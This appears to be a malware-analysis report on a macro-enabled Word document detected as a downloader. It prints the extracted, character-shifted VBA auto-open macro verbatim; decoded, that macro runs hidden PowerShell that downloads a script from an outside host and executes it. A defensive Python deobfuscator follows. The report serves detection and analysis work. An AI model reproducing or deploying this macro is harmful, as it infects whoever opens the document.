Risk Score: 266 (MALICIOUS)
Heuristics (8)

- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): matched line in script: `Shell (Last)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN): matched line in script: `Sub Workbook_Open()`
- Auto_Open macro (low, OLE_VBA_AUTO): matched line in script: `Sub Auto_Open()`
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below were found in document text (OOXML body / shared strings). Every one of them is an OOXML or DrawingML XML namespace identifier of the kind declared in the part headers of any Word document, not a network destination, so none of them is an indicator of compromise. The URL this macro actually contacts is assembled at run time from ChrW() calls and does not appear in this list.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4161 bytes | 0fc4619faee1dd9bb57977ae6850f6af5be09b7f708dad37ac74ad7b20b86701 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 16384 bytes | a1b8ab42b701e21fd969fa446f8463bffd4c07378f208bc19335be26cea54271 |

macros.bas, preview script (first 1,000 lines of the extracted script). The preview concatenates two modules: the ThisDocument class module, which carries only its attribute header, and the NewMacros module that holds the code. Each character of the command is stored one code point high and shifted back with ChrW(n - 1) at run time; the twenty fragments are concatenated into Last and passed to Shell. Note that the module defines all three auto-execution entry points: AutoOpen is the one Word runs on open, while Auto_Open and Workbook_Open are Excel's equivalents and simply call AutoOpen, so the same module would fire in either host.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
exec1 = ChrW(113 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(102 - 1) + ChrW(115 - 1) + ChrW(116 - 1) + ChrW(105 - 1) + ChrW(102 - 1) + ChrW(109 - 1) + ChrW(109 - 1) + ChrW(47 - 1)
exec2 = ChrW(102 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(70 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(118 - 1) + ChrW(117 - 1)
exec3 = ChrW(106 - 1) + ChrW(112 - 1) + ChrW(111 - 1) + ChrW(81 - 1) + ChrW(112 - 1) + ChrW(109 - 1) + ChrW(106 - 1) + ChrW(100 - 1) + ChrW(122 - 1) + ChrW(33 - 1) + ChrW(99 - 1)
exec4 = ChrW(122 - 1) + ChrW(113 - 1) + ChrW(98 - 1) + ChrW(116 - 1) + ChrW(116 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(111 - 1) + ChrW(112 - 1) + ChrW(113 - 1) + ChrW(115 - 1)
exec5 = ChrW(112 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(120 - 1) + ChrW(106 - 1) + ChrW(111 - 1) + ChrW(101 - 1)
exec6 = ChrW(112 - 1) + ChrW(120 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(122 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(105 - 1) + ChrW(106 - 1) + ChrW(101 - 1)
exec7 = ChrW(101 - 1) + ChrW(102 - 1) + ChrW(111 - 1) + ChrW(33 - 1) + ChrW(41 - 1) + ChrW(111 - 1) + ChrW(102 - 1) + ChrW(120 - 1) + ChrW(46 - 1) + ChrW(112 - 1) + ChrW(99 - 1)
exec8 = ChrW(107 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(117 - 1) + ChrW(33 - 1) + ChrW(84 - 1) + ChrW(122 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(102 - 1) + ChrW(110 - 1)
exec9 = ChrW(47 - 1) + ChrW(79 - 1) + ChrW(102 - 1) + ChrW(117 - 1) + ChrW(47 - 1) + ChrW(88 - 1) + ChrW(102 - 1) + ChrW(99 - 1) + ChrW(68 - 1) + ChrW(109 - 1) + ChrW(106 - 1)
exec10 = ChrW(102 - 1) + ChrW(111 - 1) + ChrW(117 - 1) + ChrW(42 - 1) + ChrW(47 - 1) + ChrW(69 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(111 - 1) + ChrW(109 - 1) + ChrW(112 - 1)
exec11 = ChrW(98 - 1) + ChrW(101 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(41 - 1) + ChrW(40 - 1) + ChrW(105 - 1) + ChrW(117 - 1) + ChrW(117 - 1)
exec12 = ChrW(113 - 1) + ChrW(59 - 1) + ChrW(48 - 1) + ChrW(48 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(47 - 1) + ChrW(103 - 1) + ChrW(98 - 1) + ChrW(116 - 1)
exec13 = ChrW(117 - 1) + ChrW(46 - 1) + ChrW(100 - 1) + ChrW(98 - 1) + ChrW(115 - 1) + ChrW(104 - 1) + ChrW(112 - 1) + ChrW(47 - 1) + ChrW(100 - 1) + ChrW(112 - 1) + ChrW(110 - 1)
exec14 = ChrW(48 - 1) + ChrW(106 - 1) + ChrW(110 - 1) + ChrW(98 - 1) + ChrW(104 - 1) + ChrW(102 - 1) + ChrW(116 - 1) + ChrW(48 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1)
exec15 = ChrW(102 - 1) + ChrW(48 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(48 - 1) + ChrW(113 - 1) + ChrW(116 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1)
exec16 = ChrW(40 - 1) + ChrW(45 - 1) + ChrW(40 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1)
exec17 = ChrW(117 - 1) + ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1) + ChrW(40 - 1) + ChrW(42 - 1) + ChrW(60 - 1)
exec18 = ChrW(33 - 1) + ChrW(74 - 1) + ChrW(111 - 1) + ChrW(119 - 1) + ChrW(112 - 1) + ChrW(108 - 1) + ChrW(102 - 1) + ChrW(46 - 1) + ChrW(74 - 1) + ChrW(117 - 1) + ChrW(102 - 1)
exec19 = ChrW(110 - 1) + ChrW(33 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1) + ChrW(117 - 1)
exec20 = ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1)
Last = exec0 + exec1 + exec2 + exec3 + exec4 + exec5 + exec6 + exec7 + exec8 + exec9 + exec10 + exec11 + exec12 + exec13 + exec14 + exec15 + exec16 + exec17 + exec18 + exec19 + exec20
Shell (Last)
End Sub
Sub Auto_Open()
AutoOpen
End Sub
Sub Workbook_Open()
AutoOpen
End Sub
```

vbaProject_00.bin, detection:

- ClamAV: Doc.Downloader.Generic-6698421-0
- Obfuscation or payload: unlikely
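The ChrW(n - 1) chains in macros.bas are a static substitution, so the command can be recovered without ever running the macro. The following Python script is an added example written for this page; it is not part of the analyzer, of olevba, or of the sample. It walks the assignments in source order and evaluates each right-hand side (it also accepts ChrW(a + b), quoted string literals and the & operator, which this sample does not use), resolves the variable handed to Shell, pulls the URL and the dropped filename out of the result, and finally runs a simplified, source-text version of the auto-exec/execution-token pairing described under OLE_VBA_PCODE_AUTOEXEC_EXEC to show that the PowerShell token only surfaces after decoding. The sample input is the NewMacros module copied from the preview above; the function names and regular expressions are this example's own.

```python
import re

# Constructed sample input: the NewMacros module from the macros.bas preview above,
# ChrW() chains reproduced verbatim (the ThisDocument attribute header carries no code).
MACRO_SRC = r"""
Sub AutoOpen()
exec1 = ChrW(113 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(102 - 1) + ChrW(115 - 1) + ChrW(116 - 1) + ChrW(105 - 1) + ChrW(102 - 1) + ChrW(109 - 1) + ChrW(109 - 1) + ChrW(47 - 1)
exec2 = ChrW(102 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(70 - 1) + ChrW(121 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(118 - 1) + ChrW(117 - 1)
exec3 = ChrW(106 - 1) + ChrW(112 - 1) + ChrW(111 - 1) + ChrW(81 - 1) + ChrW(112 - 1) + ChrW(109 - 1) + ChrW(106 - 1) + ChrW(100 - 1) + ChrW(122 - 1) + ChrW(33 - 1) + ChrW(99 - 1)
exec4 = ChrW(122 - 1) + ChrW(113 - 1) + ChrW(98 - 1) + ChrW(116 - 1) + ChrW(116 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(111 - 1) + ChrW(112 - 1) + ChrW(113 - 1) + ChrW(115 - 1)
exec5 = ChrW(112 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(46 - 1) + ChrW(120 - 1) + ChrW(106 - 1) + ChrW(111 - 1) + ChrW(101 - 1)
exec6 = ChrW(112 - 1) + ChrW(120 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(122 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(33 - 1) + ChrW(105 - 1) + ChrW(106 - 1) + ChrW(101 - 1)
exec7 = ChrW(101 - 1) + ChrW(102 - 1) + ChrW(111 - 1) + ChrW(33 - 1) + ChrW(41 - 1) + ChrW(111 - 1) + ChrW(102 - 1) + ChrW(120 - 1) + ChrW(46 - 1) + ChrW(112 - 1) + ChrW(99 - 1)
exec8 = ChrW(107 - 1) + ChrW(102 - 1) + ChrW(100 - 1) + ChrW(117 - 1) + ChrW(33 - 1) + ChrW(84 - 1) + ChrW(122 - 1) + ChrW(116 - 1) + ChrW(117 - 1) + ChrW(102 - 1) + ChrW(110 - 1)
exec9 = ChrW(47 - 1) + ChrW(79 - 1) + ChrW(102 - 1) + ChrW(117 - 1) + ChrW(47 - 1) + ChrW(88 - 1) + ChrW(102 - 1) + ChrW(99 - 1) + ChrW(68 - 1) + ChrW(109 - 1) + ChrW(106 - 1)
exec10 = ChrW(102 - 1) + ChrW(111 - 1) + ChrW(117 - 1) + ChrW(42 - 1) + ChrW(47 - 1) + ChrW(69 - 1) + ChrW(112 - 1) + ChrW(120 - 1) + ChrW(111 - 1) + ChrW(109 - 1) + ChrW(112 - 1)
exec11 = ChrW(98 - 1) + ChrW(101 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1) + ChrW(102 - 1) + ChrW(41 - 1) + ChrW(40 - 1) + ChrW(105 - 1) + ChrW(117 - 1) + ChrW(117 - 1)
exec12 = ChrW(113 - 1) + ChrW(59 - 1) + ChrW(48 - 1) + ChrW(48 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(120 - 1) + ChrW(47 - 1) + ChrW(103 - 1) + ChrW(98 - 1) + ChrW(116 - 1)
exec13 = ChrW(117 - 1) + ChrW(46 - 1) + ChrW(100 - 1) + ChrW(98 - 1) + ChrW(115 - 1) + ChrW(104 - 1) + ChrW(112 - 1) + ChrW(47 - 1) + ChrW(100 - 1) + ChrW(112 - 1) + ChrW(110 - 1)
exec14 = ChrW(48 - 1) + ChrW(106 - 1) + ChrW(110 - 1) + ChrW(98 - 1) + ChrW(104 - 1) + ChrW(102 - 1) + ChrW(116 - 1) + ChrW(48 - 1) + ChrW(103 - 1) + ChrW(106 - 1) + ChrW(109 - 1)
exec15 = ChrW(102 - 1) + ChrW(48 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(48 - 1) + ChrW(113 - 1) + ChrW(116 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1)
exec16 = ChrW(40 - 1) + ChrW(45 - 1) + ChrW(40 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1)
exec17 = ChrW(117 - 1) + ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1) + ChrW(40 - 1) + ChrW(42 - 1) + ChrW(60 - 1)
exec18 = ChrW(33 - 1) + ChrW(74 - 1) + ChrW(111 - 1) + ChrW(119 - 1) + ChrW(112 - 1) + ChrW(108 - 1) + ChrW(102 - 1) + ChrW(46 - 1) + ChrW(74 - 1) + ChrW(117 - 1) + ChrW(102 - 1)
exec19 = ChrW(110 - 1) + ChrW(33 - 1) + ChrW(74 - 1) + ChrW(110 - 1) + ChrW(113 - 1) + ChrW(112 - 1) + ChrW(115 - 1) + ChrW(117 - 1) + ChrW(98 - 1) + ChrW(111 - 1) + ChrW(117 - 1)
exec20 = ChrW(101 - 1) + ChrW(112 - 1) + ChrW(100 - 1) + ChrW(47 - 1) + ChrW(119 - 1) + ChrW(99 - 1) + ChrW(116 - 1)
Last = exec0 + exec1 + exec2 + exec3 + exec4 + exec5 + exec6 + exec7 + exec8 + exec9 + exec10 + exec11 + exec12 + exec13 + exec14 + exec15 + exec16 + exec17 + exec18 + exec19 + exec20
Shell (Last)
End Sub
Sub Auto_Open()
AutoOpen
End Sub
Sub Workbook_Open()
AutoOpen
End Sub
"""

# "name = <expression>" on a single line; VBA line continuations are not handled here.
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.M)
# One alternative per token kind: ChrW(a op b), "literal", identifier, + or &, anything else.
TOKEN_RE = re.compile(r'ChrW\(\s*(\d+)\s*([-+])\s*(\d+)\s*\)|"([^"]*)"|([A-Za-z_]\w*)|([+&])|(\S)')

# Token lists as given in the OLE_VBA_PCODE_AUTOEXEC_EXEC description on this page.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open", "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe", "URLDownloadToFile",
               "WinHttp", "XMLHTTP", "ADODB.Stream", "ShellExecute", "ExecuteExcel4Macro"]


def evaluate(rhs, env):
    """Evaluate a concatenation of ChrW() terms, string literals and already-bound names."""
    out = []
    for a, op, b, lit, ident, _concat, junk in TOKEN_RE.findall(rhs):
        if a:
            out.append(chr(int(a) - int(b) if op == "-" else int(a) + int(b)))
        elif ident:
            # exec0 is never assigned: an unassigned VBA Variant is Empty and adds nothing
            # to a string concatenation, so unknown names resolve to "".
            out.append(env.get(ident, ""))
        elif junk:
            raise ValueError(f"unsupported token {junk!r} in {rhs!r}")
        else:
            out.append(lit)  # quoted literal; for a bare + or & this is "" and is a no-op
    return "".join(out)


def deobfuscate(src):
    """Bind every assignment in source order so later lines can reference earlier ones."""
    env = {}
    for name, rhs in ASSIGN_RE.findall(src):
        env[name] = evaluate(rhs, env)
    return env


def recover_shell_command(src):
    """Return the decoded value of the variable passed to Shell, or None if there is no Shell call."""
    env = deobfuscate(src)
    m = re.search(r"\bShell\s*\(?\s*([A-Za-z_]\w*)", src)
    return env.get(m.group(1)) if m else None


def extract_iocs(command):
    """Split the single-quoted literals of the recovered command into URLs and local file names."""
    literals = re.findall(r"'([^']*)'", command)
    urls = [s for s in literals if re.match(r"https?://", s, re.I)]
    return {"urls": urls, "dropped_files": [s for s in literals if s not in urls]}


def autoexec_exec_pairing(text):
    """Source-text approximation of the p-code pairing rule: (autoexec hits, exec hits).
    The report's heuristic fires only when both lists are non-empty."""
    def hits(tokens):
        return [t for t in tokens if re.search(r"\b" + re.escape(t) + r"\b", text, re.I)]
    return hits(AUTOEXEC_TOKENS), hits(EXEC_TOKENS)


if __name__ == "__main__":
    cmd = recover_shell_command(MACRO_SRC)
    print("Shell argument:", cmd)
    print("IOCs:", extract_iocs(cmd))
    print("Pairing on source:", autoexec_exec_pairing(MACRO_SRC))
    print("Pairing on decoded command:", autoexec_exec_pairing(cmd))
```

Run as a script, it prints the recovered command line and the two pairings. Do not execute the recovered command; the point of static evaluation is to obtain the IOCs without letting the downloader run. The pairing function is only an illustration of the rule: the analyzer's heuristic operates on compiled p-code streams, whereas this runs over text and shows that the raw source yields Shell as the only execution token while the decoded string yields PowerShell.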